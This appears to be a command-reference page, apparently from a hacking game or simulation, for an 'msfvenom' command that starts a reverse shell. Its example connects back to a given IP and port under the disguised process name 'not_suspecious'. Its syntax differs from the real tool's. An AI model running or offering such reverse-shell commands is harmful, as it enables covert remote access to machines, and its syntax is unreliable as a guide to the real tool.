Skip to content

msfvenom

Starts a reverse shell.

Terminal window
msfvenom [IP] [PORT] [PROC]
  • IP — specify the IP you want the reverse shell to connect back to
  • PORT — specify a port you want to reverse shell to connect back to
  • PROC — specify the process name of the reverse shell
Terminal window
msfvenom 177.58.127.159 1222 not_suspecious

Result:
Started a reverse shell that connects back to “177.58.127.159” on port “1222” with name “not_suspecious”